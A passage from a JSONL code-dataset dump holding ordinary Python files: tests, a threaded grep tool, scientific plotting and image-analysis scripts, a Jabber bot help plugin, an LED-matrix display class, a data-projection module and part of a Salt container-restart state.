config.read(\"config.txt\")\n\n super(ConcentrationGame, self).__init__(session)\n self.experiment_repeats = 1\n N = config.get(\"Experiment\", \"num_participants\")\n self.initial_recruitment_size = N\n self.setup()\n","sub_path":"demos/concentration/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"585405805","text":"import pytest\nfrom setting import Setting\nfrom modules.BlockBase import BlockBase\nfrom modules.block_wunderground import BlockWunderGround\n\nSECTION_NAME = \"WunderGroundBlock\"\n\n\n@pytest.mark.block_wunderground\ndef test_block_wunderground(logger):\n config = Setting()\n with pytest.raises(TypeError):\n BlockWunderGround(None, None)\n with pytest.raises(TypeError):\n BlockWunderGround(None, config)\n with pytest.raises(TypeError):\n BlockWunderGround(logger, None)\n block = BlockWunderGround(logger, config)\n assert block is not None\n assert isinstance(block, BlockBase)\n with pytest.raises(KeyError):\n block.init({})\n","sub_path":"test/test_block_wunderground.py","file_name":"test_block_wunderground.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"82139842","text":"#!/usr/bin/python3\n\nimport os\nimport sys\nimport optparse\nimport queue\nimport threading\n\nclass Worker(threading.Thread):\n\n def __init__(self, work_queue, word, thread_id):\n super().__init__()\n self.work_queue = work_queue\n self.word = word\n self.thread_id = thread_id\n\n def run(self):\n while True:\n try:\n file = self.work_queue.get()\n self.process(file)\n finally:\n self.work_queue.task_done()\n\n def process(self, file):\n BLOCK_SIZE = 8000\n previous = ''\n try:\n with open(file, 'rb') as fh:\n while True:\n block = fh.read(BLOCK_SIZE)\n if not block:\n break\n block_decoded = block.decode('utf8', 'ignore')\n if (self.word in block_decoded or\n self.word in previous[-len(self.word):]\n + block_decoded[:len(self.word)]):\n print('{}{}'.format(self.thread_id, file))\n if len(block_decoded) != BLOCK_SIZE:\n break\n previous = block_decoded\n except EnvironmentError as err:\n print('{}{}{}'.format(self.thread_id, file, err))\n\n\ndef get_opts_args():\n parser = optparse.OptionParser()\n parser.set_usage(parser.get_usage().strip('\\n') + ' word file1/path1 [file2/path2]...')\n parser.add_option('-w', '--word', dest='word', type=str,\n help=('Single word you will be looking for.'))\n parser.add_option('-c', '--count', dest='count', type=int, default=1,\n help=('Number of child processes to run [default: 1] [max: 20].'))\n parser.add_option('-r', '--recursive', dest='recurse', action='store_true',\n default=False, help=('Recurse into subdirectories [default: False].'))\n parser.add_option('-d', '--debug', dest='debug', action='store_true',\n default=False, help=('Launch in debug mode [default: False].'))\n opts, args = parser.parse_args()\n if not args or not opts.word or (opts.count and not (0 < opts.count <= 20)):\n parser.print_help()\n sys.exit()\n return opts, opts.word, args\n\n\ndef get_files(files_or_paths, recursive):\n files_list = []\n for file_or_path in files_or_paths:\n if os.path.isfile(file_or_path):\n files_list.append(os.path.abspath(file_or_path))\n else:\n if recursive:\n for root, dirs, files in os.walk(file_or_path):\n for file in files:\n files_list.append(os.path.join(root, file))\n return files_list\n\n\ndef main():\n opts, word, args = get_opts_args()\n file_list = get_files(args, opts.recurse)\n work_queue = queue.Queue()\n for i in range(opts.count):\n thread_id = '{}: '.format(i + 1) if opts.debug else ''\n worker = Worker(work_queue, word, thread_id)\n worker.daemon = True\n worker.start()\n for file in file_list:\n work_queue.put(file)\n work_queue.join()\n\n\nmain()\n","sub_path":"Tenth Chapter/grepword-t.py","file_name":"grepword-t.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"124660211","text":"'''\n\n'''\n\nfrom astropy.io import ascii\nimport numpy as np\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib import colors\nfrom matplotlib.ticker import ScalarFormatter\n\n# Fixing random state for reproducibility\nnp.random.seed(19680801)\n\npath='/cos_pc19a_npr/programs/quasars/highest_z/MIR_LCs/'\nfile = 'NoOfEpochs_perQuasar.dat'\n\ndata_in = ascii.read(path+file) \nprint(type(data_in))\ndata = np.array(data_in).astype(np.float)\n\n\nN_points = 100000\n# Generate a normal distribution, center at x=0 and y=5\nx = np.random.randn(N_points)\ny = .4 * x + np.random.randn(100000) + 5\n\nfig, ax = plt.subplots(figsize=(8.5, 8.5)) # inches\n\n## placement of figure...\nleft = 0.16 # the left side of the subplots of the figure\nright = 0.98 # the right side of the subplots of the figure\nbottom = 0.12 # the bottom of the subplots of the figure\ntop = 0.96 # the top of the subplots of the figure\nwspace = 0.00 # the amount of width reserved for blank space between subplots\nhspace = 0.00 # the amount of height reserved for white space between subplots\nplt.subplots_adjust(left=left, bottom=bottom, right=right, top=top, wspace=wspace, hspace=hspace)\n\n\n## define the colormap\ncmap = plt.cm.inferno_r\n\nls = 'solid'\nlw = 1.0\nms = 60.\nms_large = ms*3.\nfontsize=24\nalpha=1.00\nnbins = 20\n\n#ax.hist(x, bins=nbins)\nax.hist(data, bins=nbins)\n\nax.set_xlim((0.9, 360))\nax.set_ylim((0.8, 300))\n\n#ax.set_xscale(\"log\", nonposx='clip')\nax.set_yscale(\"log\", nonposy='clip')\nfor axis in [ax.xaxis, ax.yaxis]:\n axis.set_major_formatter(ScalarFormatter())\n\nax.set_xlabel('No. of NEOWISE-R epochs', fontsize=fontsize)\nax.set_ylabel('No. of VHzQs', fontsize=fontsize)\nax.tick_params('x', direction='in', which='both', bottom='True', top='True', left='True', right='True', labelsize=fontsize)\nax.tick_params('y', direction='in', which='both', bottom='True', top='True', left='True', right='True', labelsize=fontsize)\nax\n\n#plt.show()\nplt.savefig('NEOWISER_LC_histogram_temp.png', format='png')\nplt.savefig('NEOWISER_LC_histogram_temp.pdf', format='pdf')\nplt.close(fig)\n\n\n","sub_path":"MIR_LCs/NEOWISER_LC_histogram.py","file_name":"NEOWISER_LC_histogram.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"40212511","text":"# -*- coding: utf-8 -*-\r\n\r\nHELPER_TIME = 0\r\nHELPER_FILE = 'dynamic/helper.txt'\r\nHELPER_GLOB = {}\r\n\r\ndb_file(HELPER_FILE, dict)\r\n\r\ntry: HELPER_GLOB = eval(read_file(HELPER_FILE))\r\nexcept: HELPER_GLOB = {}\r\n\r\n#HELPER_MSG = [u'Узнать мои команды можно написав команды все, получить помощь по команде - помощь и название команды!',u'Я бесплатный бот, завести меня можно дав команду зайти и ваш адрес чата!',u'Бесплатная игра мафия прямо с чата - пиши !мафия и зови друзей!',u'UIN бота в ICQ - 646210729']\r\n\r\ndef hnd_autohelper_work(t, s, p):\r\n global HELPER_FILE\r\n global HELPER_GLOB\r\n if not s[1] in GROUPCHATS.keys(): return\r\n db = eval(read_file(HELPER_FILE))\r\n if s[1] in db.keys():\r\n reply(t, s, u'Помощь по командам в статусе Oтключена!')\r\n del db[s[1]]\r\n else:\r\n reply(t, s, u'Помощь по командам в статусе Bключена!')\r\n db[s[1]] = {}\r\n HELPER_GLOB = db.copy()\r\n write_file(HELPER_FILE, str(db))\r\n \r\ndef hnd_autohelper(r, t, s, p):\r\n global HELPER_TIME\r\n global HELPER_GLOB\r\n f = 'dynamic/chatroom.list'\r\n if time.time()-HELPER_TIME>1800:\r\n HELPER_TIME = time.time()\r\n db = eval(read_file(f))\r\n list = [x for x in COMMANDS.keys() if COMMANDS[x]['access']<31 and len(COMMANDS[x]['desc'])>3]\r\n list = [x for x in list if not x in [u'пинг',u'тест',u'бан',u'кик',u'админ',u'никто',u'унбан']]\r\n for x in db.keys():\r\n for c in db[x].keys():\r\n if not c in HELPER_GLOB.keys(): continue\r\n cmd = random.choice(list)\r\n p = domish.Element(('jabber:client', 'presence'))\r\n p['to'] = u'%s/%s' % (c, get_bot_nick(c))\r\n try: p.addElement('status').addContent(u'(Помощь по командам): '+cmd + ' - ' + COMMANDS[cmd]['desc'].decode('utf8','replace'))\r\n except: continue\r\n p.addElement('show').addContent('chat')\r\n p.addElement('x', 'http://jabber.org/protocol/muc').addElement('history').__setitem__('maxchars', '0')\r\n try: reactor.callFromThread(dd, p, CLIENTS[x])\r\n except: pass\r\n\r\nregister_message_handler(hnd_autohelper)\r\nregister_command_handler(hnd_autohelper_work, 'статусхелп', ['все'], 20, 'Включает/отключает автопомощь по командам в статусе', 'статусхелп', ['статусхелп'])\r\n\r\n","sub_path":"plugins/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"481478337","text":"#!/usr/bin/env python3 \n\nimport sys, subprocess, os\nimport time\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\ndef getUserHome():\n\thomeDir = os.path.expanduser('~')\n\treturn str(homeDir)\n\ndef getUsername():\n\tusername = os.getlogin()\n\treturn str(username)\n\nif __name__ == \"__main__\":\t\n\tprint(\"\\tfake_bell\")\n\tprint(\"\\t\", sys.argv)\n\ttime.sleep(0.5)\n\tsys.exit()\n","sub_path":"fake_bell.py","file_name":"fake_bell.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"37131496","text":"from luma.led_matrix.device import max7219\r\nfrom luma.core.interface.serial import spi, noop\r\nfrom luma.core.render import canvas\r\nfrom luma.core.legacy import text\r\nfrom luma.core.legacy.font import proportional, TINY_FONT, CP437_FONT\r\n\r\nimport time\r\nimport math\r\n\r\nclass Screen:\r\n \"\"\"8x8 dotmatrix 'screen' using a max7219 chip\"\"\"\r\n\r\n def __init__(self):\r\n serial = spi(port = 0, device = 0, gpio = noop())\r\n # initialize a device of 3 matrices wide (24 leds) and 2 matrices high (16 leds)\r\n self.width = 24 # in pixels\r\n self.device = max7219(serial, width = self.width, height = 16, block_orientation=-90)\r\n # set brightness to lowest\r\n self.device.contrast(0)\r\n self.screen_sleep = False # variable to know if screen is in sleep mode\r\n\r\n def display(self, top_right, bottom_right, img):\r\n \"\"\" Display given strings and icon on the matrix screen on corresponding locations.\r\n If None is given, item is not displayed \"\"\"\r\n\r\n # if there is at least one item to display\r\n if top_right is not None or bottom_right is not None or img is not None:\r\n with canvas(self.device) as draw:\r\n if top_right is not None:\r\n text(draw, (17, -1), top_right, fill=\"white\", font=TINY_FONT)\r\n\r\n if bottom_right is not None:\r\n # draw a small roof over inside temperature\r\n draw.line((20, 7, 17, 9), fill=\"white\")\r\n draw.line((20, 7, 23, 9), fill=\"white\")\r\n\r\n text(draw, (17, 10), bottom_right, fill=\"white\", font=TINY_FONT)\r\n\r\n if img is not None:\r\n draw.bitmap((0,0), img, fill=\"white\")\r\n # if there are no items to display (all 3 are None)\r\n else:\r\n self.display_text(\"Error\")\r\n\r\n def display_top_bottom(self, top, bottom):\r\n \"\"\" displays one line at the top of the screen and one at the bottom \"\"\"\r\n\r\n if top and bottom:\r\n with canvas(self.device) as draw:\r\n text(draw, (0, 0), top, fill=\"white\", font=TINY_FONT)\r\n text(draw, (0, 8), bottom, fill=\"white\", font=TINY_FONT)\r\n\r\n else:\r\n self.display_text(\"Error\")\r\n\r\n\r\n def display_text(self, string):\r\n \"\"\" displays between 1 and 12 characters on the screen in TINY_FONT\r\n Centers text vertically and horizontally, wrapping lines if necessary. \"\"\"\r\n # TODO? make this really flexible with every possible width and height?\r\n # TODO? make it wrap at spaces if possible\r\n\r\n chars = len(string)\r\n # if string is smaller than 6 characters\r\n # (maximum of 6 characters fit on one line of the screen)\r\n if chars <= 6:\r\n # calculate centered x position for line\r\n x = self.calculate_x_pos(chars)\r\n with canvas(self.device) as draw:\r\n text(draw, (x, 4), string, fill=\"white\", font=TINY_FONT)\r\n\r\n # if string is between 7 and 12 characters\r\n if chars > 6 and chars <= 12:\r\n # divide string in 2 lines\r\n divide = math.ceil(chars / 2)\r\n # calculate centered x positions for both lines\r\n x1 = self.calculate_x_pos(divide)\r\n x2 = self.calculate_x_pos(chars - divide)\r\n\r\n with canvas(self.device) as draw:\r\n text(draw, (x1, 1), string[:divide], fill=\"white\", font=TINY_FONT)\r\n text(draw, (x2, 7), string[divide:], fill=\"white\", font=TINY_FONT)\r\n\r\n def display_bitmap(self, img):\r\n \"\"\" display a 16x16 monochrome bitmap in the center of the screen \"\"\"\r\n\r\n with canvas(self.device) as draw:\r\n if img is not None:\r\n draw.bitmap((4,0), img, fill=\"white\")\r\n\r\n def calculate_x_pos(self, amount_of_characters):\r\n \"\"\" calculate the x position so that the string can be centered horizontally\r\n according to the amount of character \"\"\"\r\n\r\n # calculate amount of pixels that the string is wide\r\n # (one character is 3 pixels wide + 1 pixel whitespace)\r\n line_length = amount_of_characters * 4 - 1\r\n # calculate centered x position on screen\r\n return self.width / 2 - math.ceil(line_length / 2)\r\n\r\n def is_sleeping(self):\r\n return self.screen_sleep\r\n\r\n def wake_up(self):\r\n \"\"\" wakes the screen from a low-power sleeping state \"\"\"\r\n\r\n self.device.show()\r\n self.screen_sleep = False\r\n print(\"Woke up screen\")\r\n\r\n def go_to_sleep(self):\r\n \"\"\" puts the screen in a low-power sleeping state \"\"\"\r\n\r\n self.device.hide()\r\n self.screen_sleep = True\r\n print(\"Put screen to sleep\")\r\n","sub_path":"screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"61663864","text":"import numpy as np\nfrom numpy.linalg import norm\nfrom typing import List, Callable, Any, Tuple\nimport scipy.stats as ss\n\nPoint: type = Any\nLabel = int\nDpoint = Tuple[Point, Label]\n\n\nD = 2\nMU = 0.\nSIG = 1.\nMEAN = np.full(D, MU)\nCOV = np.diag(np.full(D, SIG))\n\n\ndef cdf(x):\n return abs(ss.norm.cdf(x)-0.5)\n\n\ndef ppf(x):\n return abs(ss.norm.ppf(x+0.5))\n\n\ndef update():\n global MEAN, COV\n MEAN = np.full(D, MU)\n COV = np.diag(np.full(D, SIG))\n\n\ndef T(p: Point) -> Point:\n v = p-MEAN\n if norm(v) != 0:\n p = MEAN + v * ppf(norm(v)) / norm(v)\n return p\n\n\ndef Tinv(p: Point) -> Point:\n v = p - MEAN\n if norm(v) != 0:\n p = MEAN + v * cdf(norm(v)) / norm(v)\n return p\n","sub_path":"Memoriser/Memoriser/Transforms/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"622661317","text":"import unittest\nimport libnox\n\nclass valorEstimado_testes(unittest.TestCase):\n # Teste unitário de retorno de valor de Bitcoin para compra\n def test_valor_compra(self):\n resultado=libnox.valorEstimado('compra')\n self.assertGreater(resultado,0,'Retorno de Valor de compra inferior a 0')\n\n # Teste unitário de retorno de valor de Bitcoin para venda\n def test_valor_venda(self):\n resultado=libnox.valorEstimado('venda')\n self.assertGreater(resultado,0,'Retorno de Valor de venda inferior a 0')\n\n # Teste unitário para comparar preço de venda com preço de compra\n def test_comparar_compra_venda(self):\n vlcompra = libnox.valorEstimado('compra')\n vlvenda=libnox.valorEstimado('venda')\n self.assertGreater(vlvenda,vlcompra,'Retorno de Valor de Compra maior que de Venda')\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"test/valorEstimado_testes.py","file_name":"valorEstimado_testes.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"402826217","text":"# Copyright 2017-2020 Lawrence Livermore National Security, LLC and other\n# CallFlow Project Developers. See the top-level LICENSE file for details.\n#\n# SPDX-License-Identifier: MIT\n\nimport json\nimport pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\nfrom sklearn.manifold import TSNE, MDS\nfrom sklearn.cluster import KMeans\nfrom callflow.algorithms import KMedoids\n\n# from callflow.algorithms import DeltaConSimilarity\n\n\nclass ParameterProjection:\n \"\"\"\n Parameter projection view\n \"\"\"\n\n def __init__(self, supergraph, targetDataset=\"\", n_cluster=3):\n\n self.df = supergraph.gf.df\n self.datasets = self.df[\"dataset\"].unique().tolist()\n self.projection = \"MDS\"\n self.clustering = \"k_means\"\n self.n_cluster = int(n_cluster)\n self.targetDataset = targetDataset\n if len(self.datasets) >= self.n_cluster:\n self.result = self.run()\n else:\n self.result = pd.DataFrame({})\n\n def add_df_params(self, dataset):\n ret = {}\n ret[\"max_inclusive_time\"] = self.df.loc[self.df[\"dataset\"] == dataset][\n \"time (inc)\"\n ].max()\n ret[\"max_exclusive_time\"] = self.df.loc[self.df[\"dataset\"] == dataset][\n \"time\"\n ].max()\n ret[\"rank_count\"] = len(\n self.df.loc[self.df[\"dataset\"] == dataset][\"rank\"].unique()\n )\n # ret['similarity'] = self.similarities[self.datasetOrder[self.targetDataset]]\n return ret\n\n def dump_similarities(self, name):\n similarity_filepath = name + \"/\" + \"similarity.json\"\n with open(similarity_filepath, \"r\") as similarity_file:\n self.similarities = json.load(similarity_file)\n\n def run(self):\n rows = []\n for idx, dataset in enumerate(self.datasets):\n df_params = self.add_df_params(dataset)\n rows.append(df_params)\n # self.states[state].projection_data.update(df_params)\n\n # row_list = []\n # for idx, state in enumerate(self.states):\n # if(state != 'ensemble'):\n # row_list.append(self.states[state].projection_data)\n\n df = pd.DataFrame(rows)\n\n # TODO: Remove all string columns from the dataframe.\n if \"dataset\" in df.columns:\n df = df.drop(columns=[\"dataset\"])\n x = df.values # returns a numpy array\n\n # Scale the values to value between 0 to 1\n min_max_scaler = preprocessing.MinMaxScaler()\n x_scaled = min_max_scaler.fit_transform(x)\n df = pd.DataFrame(x_scaled)\n X = np.vstack([df.values.tolist()])\n\n random_number = 20150101\n if self.projection == \"MDS\":\n proj = MDS(random_state=random_number).fit_transform(X)\n\n elif self.projection == \"TSNE\":\n proj = TSNE(random_state=random_number).fit_transform(X)\n\n ret = pd.DataFrame(proj, columns=list(\"xy\"))\n ret[\"dataset\"] = self.datasets\n\n # if self.clustering == \"prog_k_means\":\n # self.clusters = ProgKMeans(n_clusters=self.n_cluster)\n # self.clusters.progressive_fit(X, latency_limit_in_msec=100)\n # ret[\"label\"] = self.clusters.predict(X).tolist()\n\n if self.clustering == \"k_medoids\":\n self.clusters = KMedoids(n_cluster=self.n_cluster)\n ret[\"label\"] = self.clusters.fit(X)\n elif self.clustering == \"k_means\":\n self.clusters = KMeans(\n n_clusters=self.n_cluster, random_state=random_number\n )\n ret[\"label\"] = self.clusters.fit(X).labels_\n\n return ret\n","sub_path":"callflow/modules/parameter_projection.py","file_name":"parameter_projection.py","file_ext":"py","file_size_in_byte":3592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"165946680","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 28 10:32:20 2018\n\n@author: user\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport pims\nimport fluids2d.backlight as backlight\nimport fluids2d.bubble_pinchoff as pinchoff\nimport comps\nfrom scipy.interpolate import interp2d\nfrom scipy.signal import medfilt, argrelextrema\nimport scipy.spatial.distance\nimport skimage.morphology\n\n\ncine_name = r'bubble_pinchoff_needleShortPink_fps100k_viewI_pumpsSeries12V_v3'\nmeta = pinchoff.get_meta_dict(cine_name)\nfolder = comps.cf(meta['data_loc'])+str(meta['date_folder'])+r'\\\\'\n\nc = pims.open(folder+cine_name+'.cine')\n\nthresh=50 \n\nintns_scale = 100.\npix_scale = 2.\ngrad_scale = (intns_scale/pix_scale)**2\n\n#bg = backlight.construct_bg_image(c,frames=np.arange(len(c)-50,len(c)))\nbg = np.zeros_like(c[0])+250.\nbg = bg.astype(float)\n#crop_lims = [int(meta['top']),int(meta['bottom']),int(meta['left']),int(meta['right'])]\n\n \nbu_subpix = pinchoff.BreakupTrackedInfo(folder,cine_name,meta['breakup_frame'],meta['crop_lims'],bg,meta['dx'],1./meta['fps'])\n\ndef bgsub(f): return c[f].astype(float)-bg\n\nf = meta['breakup_frame']-1\n\n#points_chosen_res = []\n#dist_res = []\nd_frames = (np.unique(np.geomspace(1,400,250,dtype=int))*-1) # np.flipud( # 1,500,300\nimport pickle\n#bu = pickle.load(open(folder+meta['case_name']+r'_breakupInfo.pkl'))\n#d_frames = bu.d_frames\n#d_frames = np.arange(-1,-10,-1)\nf_use = f + d_frames\n#bu_subpic\n\nplt.figure(figsize=(12,9))\nplt.imshow(bu_subpix.get_im_rel_breakup(d_frames[0],c=c),cmap='viridis')\ncenter_point = np.flipud(plt.ginput(1,timeout=-1)[0])\n#center_point = np.array([211.,279.])\n#center_point = np.array([115,153])\nr_max_search = 20\n\n# get the angular separation between points\nprint('...getting the angular separation')\nn_theta = 1001\ntheta_vec = np.linspace(0,2*np.pi,n_theta)\ntheta0,theta1 = np.meshgrid(theta_vec,theta_vec)\nd_theta = np.min(np.abs([theta0-theta1,theta0-theta1+2*np.pi,theta0-theta1-2*np.pi]),axis=0)\n\npoints_chosen_res = []\ndist_res = []\ncontours = []\nL_c = []\nmajor = []\nminor = []\nlargest_dist = []\nlargest_dist_from_neck = []\narea = []\ndf_split = []\nnormal_res = []\n\nn_regions_leave = 2 # how many background regions to leave in each image\n \ntheta_target = None\nfor df in d_frames:\n \n print('df = '+str(df))\n \n if df<-10:\n thresh=0\n \n im = bu_subpix.get_im_rel_breakup(df,c=c)\n #im[im>100] = im[im>100]*-1\n #im[:100,:] = -200\n \n print('...getting the region props') \n filled = backlight.get_filled(im,thresh,filter_size=1)\n props = backlight.filled2regionpropsdf(filled,g=None,min_area=0,frame=None)\n ix_use = props['filled_area'].idxmax()\n props = props.loc[ix_use] # only need the region with the largest area\n major.append(props['major_axis_length'])\n minor.append(props['minor_axis_length'])\n area.append(props['filled_area'])\n \n '''\n As an initial guess, use the old method to get the neck\n ''' \n contour = pinchoff.get_contour(scipy.ndimage.filters.gaussian_filter(im,.2,mode='reflect'),ax=None,thresh=thresh,n_regions_leave=n_regions_leave)\n contours.append(contour.copy())\n dist,neck_points = pinchoff.get_neck(contour,np.shape(im),target_loc=center_point,target_dist=r_max_search)\n r_max_search = np.max([dist*1,20]) # updating for the next time\n neck_points=np.array(neck_points)\n theta_target = np.arctan2(neck_points[1,0]-neck_points[0,0],neck_points[1,1]-neck_points[0,1])%np.pi\n center_point = np.nanmean(neck_points,axis=0)\n center_before = center_point.copy()\n largest_dist.append(np.max(scipy.spatial.distance.cdist(contour,contour)))\n \n n_parallel_shift = 3\n \n shift_dists = []\n shift_points = []\n #normal = pinchoff.get_neck_normal(contour,neck_points,n_neighbors=round(dist))\n if dist<100:\n normal=np.arctan2(neck_points[1,0]-neck_points[0,0],neck_points[1,1]-neck_points[0,1])\n else:\n normal = pinchoff.get_neck_normal(contour,neck_points,n_neighbors=min(round(dist/2),10))\n normal_res.append(normal)\n parallel = normal-np.pi/2.\n border_grad = pinchoff.make_border_grad(im,fill_thresh=thresh,template_radius=3,n_regions_leave=n_regions_leave,orientation=None)\n theta_limit = 0.1\n \n fig,axs = plt.subplots(1,2,figsize=(13,9),sharex=True,sharey=True)\n [ax.clear() for ax in axs]\n axs[1].imshow(border_grad)\n axs[0].imshow(im,cmap='gray')\n \n for parallel_shift in range(-1*n_parallel_shift,n_parallel_shift+1):\n center_point = np.mean(neck_points,axis=0) + np.array([np.sin(parallel),np.cos(parallel)])*float(parallel_shift)\n ax.plot(center_point[1],center_point[0],'^',color='magenta')\n points = pinchoff.get_contour_points(border_grad,center_point,theta_vec,target_dist=dist,theta_target=theta_target,theta_limit=theta_limit) \n dist,points_chosen = pinchoff.get_neck_gradientMethod(points,center_point,d_theta,d_theta_limit=np.pi/2.)\n shift_dists.append(dist)\n shift_points.append(points_chosen)\n ix_choose = np.nanargmin(shift_dists)\n print('ix_choose = '+str(ix_choose))\n dist = shift_dists[ix_choose]\n points_chosen = shift_points[ix_choose]\n\n #plt.close('all')\n \n for ax in axs:\n ax.plot(contour[:,1],contour[:,0],color='g',lw=1)\n ax.plot(neck_points[:,1],neck_points[:,0],'x-',color='orange') \n ax.plot(center_point[1],center_point[0],'o',color='magenta')\n if theta_target is not None:\n line_len = r_max_search\n ax.plot([center_point[1]+line_len*np.cos(theta_target),center_point[1]-line_len*np.cos(theta_target)],[center_point[0]+line_len*np.sin(theta_target),center_point[0]-line_len*np.sin(theta_target)],color='magenta')\n ax.plot([center_point[1]+line_len*np.cos(theta_target+theta_limit),center_point[1]-line_len*np.cos(theta_target+theta_limit)],[center_point[0]+line_len*np.sin(theta_target+theta_limit),center_point[0]-line_len*np.sin(theta_target+theta_limit)],'--',color='magenta')\n ax.plot([center_point[1]+line_len*np.cos(theta_target-theta_limit),center_point[1]-line_len*np.cos(theta_target-theta_limit)],[center_point[0]+line_len*np.sin(theta_target-theta_limit),center_point[0]-line_len*np.sin(theta_target-theta_limit)],'--',color='magenta')\n \n for ax in axs:\n ax.plot(points[:,1],points[:,0],'.',color='r',alpha=0.5)\n ax.plot(points_chosen[:,1],points_chosen[:,0],'o-',color='cyan')\n \n L_c_thisFrame,intersection_points = pinchoff.get_Lc(contour,points_chosen,ax=ax)\n\n dist_res.append(dist)\n points_chosen_res.append(points_chosen) \n L_c.append(L_c_thisFrame)\n\n fig.suptitle('df = '+str(df))\n\n plt.show()\n plt.pause(0.1)\n #stophere\n #if df<-50:\n # stophere\n print('---------------------------------')\n \n \n \nother_params = {'major':np.array(major),'minor':np.array(minor),'largest_dist':np.array(largest_dist),'largest_dist_from_neck':np.array(largest_dist_from_neck),'L_c':np.array(L_c),'area':np.array(area),'df_split':df_split}\nbu_subpix.enter_data(contours,points_chosen_res,dist_res,d_frames,L_c=L_c,other_params=other_params) \n#other_params = {'major':np.array(major),'minor':np.array(minor),'largest_dist':np.array(largest_dist),'largest_dist_from_neck':np.array(largest_dist_from_neck),'L_c':np.array(L_c),'area':np.array(area),'df_split':df_split}\n#bu_subpix.enter_data(contours,points_chosen_res,dist_res,d_frames) \npickle.dump(bu_subpix,open(folder+cine_name+'_breakupInfo.pkl','wb'))\n \ndist_res = np.array(dist_res)\nplt.figure()\nplt.loglog(((f_use[:len(dist_res)]-meta['breakup_frame'])*-1-1)/meta['fps'],dist_res*meta['dx'],'-x')\nplt.loglog(bu.t*-1,bu.dists_m,'-x')\ndist_min = bu.dists_m.copy()-bu.dx*2\ndist_min[dist_min<=1e-5] = 1e-5\nplt.fill_between(bu.t*-1,bu.dists_m+bu.dx*2,dist_min,color='orange',alpha=0.2)\n\nif False:\n pickle.dump(bu_subpix,open(folder+cine_name+'_breakupInfo_subpix.pkl','wb'))\n\n\n# get the mean position of each combination of points and the value of the eroded image at this point\n#mean_pos = np.zeros((n_theta,n_theta,2))\n#center_bin_value = np.zeros((n_theta,n_theta))\n#x_vec = np.arange(0,np.shape(im)[1])\n#y_vec = np.arange(0,np.shape(im)[0])\n#bin_interp = interp2d(x_vec,y_vec,eroded.astype(float))\n#for ti1 in range(n_theta):\n# for ti2 in range(n_theta):\n# mean_pos[ti1,ti2,:] = np.mean([points[ti1,:],points[ti2,:]],axis=0)\n# #if np.isnan(mean_pos[ti1,ti2,0])==False:\n# # print(mean_pos[ti1,ti2,1])\n# # ax.plot(mean_pos[ti1,ti2,1],mean_pos[ti1,ti2,0],'x',color=[0,1,0],alpha=0.5)\n# center_bin_value[ti1,ti2] = bin_interp(mean_pos[ti1,ti2,1],mean_pos[ti1,ti2,0])\n#\n\n#@dist = dist_points(points[amin[0]],points[amin[1]])","sub_path":"scripts/subpix_normal_test.py","file_name":"subpix_normal_test.py","file_ext":"py","file_size_in_byte":8740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"534816054","text":"from __future__ import absolute_import\n\n\ndef stop_container_and_wait(name, namespace, timeout=60, **kwargs):\n '''\n Stop the running container named ``name`` running inside of\n the specified ``namespace``.\n\n Then waits for kubelet to bring up a new instance of the same\n container.\n\n name\n Name of the container. This is checked against the ``metadata.name``\n field of a kubernetes pod.\n\n namespace\n Name of the namespace to search the container inside.\n\n timeout\n If the container has not been restarted after timeout seconds, return\n with a failure.\n\n By default a 60 seconds timeout is applied.\n\n .. code-block:: yaml\n\n kube_system_haproxy:\n caasp_cri.stop_container_and_wait:\n name: haproxy\n namespace: kube-system\n timeout: 120\n '''\n\n stopped = __salt__['caasp_cri.stop_container'](name, namespace, **kwargs)\n\n if not stopped:\n __utils__['caasp_log.debug']('CaaS: {namespace}.{name} container was not found running'.format(\n namespace=namespace,\n name=name))\n\n return wait_for_container(name, namespace, timeout, **kwargs)\n\n\ndef wait_for_container(name, namespace, timeout=60, **kwargs):\n '''\n Wait for a container to be up and running.\n\n name\n Name of the container. This is checked against the ``metadata.name``\n field of a kubernetes pod.\n\n namespace\n Name of the namespace to search the container inside.\n\n timeout\n If the container is not running after ``timeout`` seconds, return\n with a failure.\n\n By default a 60 seconds timeout is applied.\n\n .. code-block:: yaml\n\n kube_system_haproxy:\n caasp_cri.wait_for_container:\n name: haproxy\n namespace: kube-system\n timeout: 120\n '''\n\n ret = {'name': name,\n 'namespace': namespace,\n 'changes': {},\n 'result': False,\n 'comment': ''}\n\n running = __salt__['caasp_cri.wait_for_container'](name,\n namespace,\n timeout,\n **kwargs)\n\n if running:\n ret['result'] = True\n ret['comment'] = '{namespace}.{container} successfully 